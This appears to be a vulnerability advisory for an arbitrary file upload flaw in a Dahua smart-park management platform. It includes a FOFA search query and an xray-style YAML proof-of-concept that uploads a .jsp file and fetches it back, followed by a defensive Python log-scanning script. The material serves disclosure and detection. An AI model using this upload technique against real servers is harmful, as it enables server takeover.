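Vulnerability Description
The video interface of the Dahua Smart Park Integrated Management Platform (大华 智慧园区综合管理平台) has an arbitrary file upload vulnerability. An attacker can exploit it to upload arbitrary files to the server and take control of the server.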
FOFA: app="dahua-智慧园区综合管理平台"
id: dahua-zhyq-video-fileupload
info:
  name: 大华 智慧园区综合管理平台 video 任意文件上传漏洞
  author: peiqi
  severity: high
  verified: true
  description: |
    大华 智慧园区综合管理平台 video 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限
    FOFA: app="dahua-智慧园区综合管理平台"
  reference:
    - https://peiqi.wgpsec.org/wiki/iot/大华/大华%20智慧园区综合管理平台%20video%20任意文件上传漏洞.html
  tags: dahua,fileupload
  created: 2023/08/13
set:
  randstr: randomLowercase(10)
  randbody: randomLowercase(30)
  rboundary: randomLowercase(8)
rules:
  r0:
    request:
      method: POST
      path: /publishing/publishing/material/file/video
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"Filedata\"; filename=\"test.jsp\"\r\n\
        \r\n\
        {{randbody}}\r\n\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"Submit\"\r\n\
        \r\n\
        submit\r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
    expression: response.status == 200 && response.body.bcontains(b'"path":')
    output:
      search: '"\"path\":\"(?P<path>.*?)\"".bsubmatch(response.body)'
      path: search["path"]
  r1:
    request:
      method: GET
      path: /publishingImg/{{path}}
    expression: response.status == 200 && response.body.bcontains(bytes(randbody))
expression: r0() && r1()
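
For defenders, the two request paths in the check above give a log signature to hunt for. The following is an added example, not part of the original page or of any Dahua or scanner code: it scans web access logs for a successful POST to the upload endpoint and for script files served from `/publishingImg/`. It assumes Combined Log Format input; the sample lines, IP addresses and file names are constructed.

```python
import re
from urllib.parse import unquote

UPLOAD_PATH = "/publishing/publishing/material/file/video"  # r0 path on this page
SERVED_PREFIX = "/publishingimg/"   # r1 prefix on this page, lowercased for matching
SCRIPT_EXT = (".jsp", ".jspx")      # server-side script types that should never be served here

# Assumed input: Combined Log Format lines from the proxy or app server.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample lines (documentation IPs, made-up file names).
SAMPLE_LOG = """\
198.51.100.7 - - [13/Aug/2023:10:01:02 +0800] "POST /publishing/publishing/material/file/video HTTP/1.1" 200 87
198.51.100.7 - - [13/Aug/2023:10:01:03 +0800] "GET /publishingImg/VIDEO/example.jsp HTTP/1.1" 200 30
192.0.2.10 - - [13/Aug/2023:10:05:00 +0800] "GET /publishingImg/VIDEO/clip.mp4 HTTP/1.1" 200 1048576
192.0.2.11 - - [13/Aug/2023:10:06:00 +0800] "POST /publishing/publishing/material/file/video HTTP/1.1" 404 0
"""


def find_upload_activity(log_text):
    """Return (kind, ip, timestamp, path) tuples for requests worth reviewing."""
    findings, uploaders = [], set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts, method, uri, status = m.groups()
        # Drop query string and path parameters, decode %xx, ignore case.
        path = unquote(uri.split("?", 1)[0]).split(";", 1)[0].lower()
        if status != "200":
            continue
        if method == "POST" and path == UPLOAD_PATH:
            # Legitimate uploads use this endpoint too: context, not a verdict.
            uploaders.add(ip)
            findings.append(("upload", ip, ts, path))
        elif path.startswith(SERVED_PREFIX) and path.endswith(SCRIPT_EXT):
            # A script served from the upload directory is the strong signal.
            kind = "script-fetch-after-upload" if ip in uploaders else "script-fetch"
            findings.append((kind, ip, ts, path))
    return findings


if __name__ == "__main__":
    for finding in find_upload_activity(SAMPLE_LOG):
        print(*finding, sep="\t")
```

A `script-fetch` hit without a preceding upload from the same client still deserves review, since the upload may have come from another address or predate the log window.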